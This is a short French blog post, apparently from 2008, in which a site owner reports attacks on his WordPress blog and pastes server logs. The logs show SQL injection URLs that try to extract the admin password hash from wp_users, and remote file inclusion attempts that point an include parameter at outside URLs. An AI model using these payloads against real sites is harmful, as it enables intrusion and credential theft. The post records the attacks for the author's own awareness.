Tentative de piratage WordPress xmlrpc.php par hostingpanama.com

Tentative de piratage WordPress xmlrpc.php par hostingpanama.com

Tentative de piratage WordPress par une simili injection de code, il y croit Toto c’est bien.

Si l’adresse 200.46.235.154 est passée sur votre blog, faites leur un coucou
noc@hostingpanama.com, soporte@hostingpanama.com, ventas@hostingpanama.com, info@hostingpanama.com

Logs:

200.46.235.154 2008-09-12 20:35:27
/wp-login.php?action=logout
Referrer: Direct hit
Hostname: hostingpanama.com
OS: Win98
BROWSER: IE 5.5
20:33:19 ->/xmlrpc.php
20:33:22 ->/xmlrpc.php
20:33:22 ->/xmlrpc.php
20:33:28 ->/xmlrpc.php
20:33:38 ->/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/
20:33:40 ->/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58(…),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/
20:33:41 ->/xmlrpc.php
20:33:49 ->/xmlrpc.php
20:33:50 ->/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/
20:33:52 ->/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58(…),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/
20:35:27 ->/xmlrpc.php

Une autre forme par bluekaboom.com :

64.13.249.26 2008-11-19 17:37:56
/?autoLoadConfig9990autoType=include&autoLo(…)ttp://www.groundviewproductions.org/Store/bo.do?
Renvoi: Hit Directe
Nom d’Hôte: bluekaboom.com
User Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) OS: Win2000 NAVIGATEUR: IE 5.5

64.13.249.26 2008-11-19 08:03:52
/?autoLoadConfig9990autoType=include&autoLo(…)oadFile=http://www.friendster.addiction2.com/a??
Renvoi: Hit Directe
Nom d’Hôte: bluekaboom.com